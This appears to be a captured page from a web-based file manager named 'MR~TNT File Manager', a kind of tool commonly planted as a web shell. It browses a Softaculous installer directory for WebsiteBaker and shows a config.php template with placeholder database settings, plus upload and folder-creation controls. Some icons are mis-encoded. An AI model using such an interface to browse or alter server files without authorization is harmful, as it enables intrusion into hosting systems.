MR~TNT File Manager
Current Path:
/var/softaculous/baker
var
/
softaculous
/
baker
/
ðŸ“
..
📄
baker.sql
(83.02 KB)
📄
baker.zip
(26.43 MB)
📄
clone.php
(4.34 KB)
📄
config.php
(658 B)
📄
edit.php
(4.38 KB)
📄
edit.xml
(433 B)
📄
fileindex.php
(156 B)
ðŸ“
images
📄
import.php
(3.35 KB)
📄
info.xml
(1.9 KB)
📄
install.js
(921 B)
📄
install.php
(5.96 KB)
📄
install.xml
(2.44 KB)
📄
md5
(5.07 KB)
📄
notes.txt
(660 B)
ðŸ“
php53
ðŸ“
php56
ðŸ“
php71
ðŸ“
php81
ðŸ“
php82
📄
upgrade.php
(16.57 KB)
📄
upgrade.xml
(309 B)
Editing: config.php
<?php /* *** auto generated config file for 2.13.8 *** WebsiteBaker 2.13.8 *** created at [[created_at]] */ // define('DEBUG', false); define('DB_TYPE', 'mysqli'); define('DB_HOST', '[[softdbhost]]'); define('DB_PORT', '3306'); define('DB_NAME', '[[softdb]]'); define('DB_USERNAME', '[[softdbuser]]'); define('DB_PASSWORD', '[[softdbpass]]'); define('DB_CHARSET', 'utf8mb4_unicode_ci'); define('TABLE_PREFIX', '[[dbprefix]]'); define('WB_URL', "[[softurl]]"); // no trailing slash or backslash!! require __DIR__.'/framework/initialize.php'; // --- end of file ----------------------------------
Upload File
Create Folder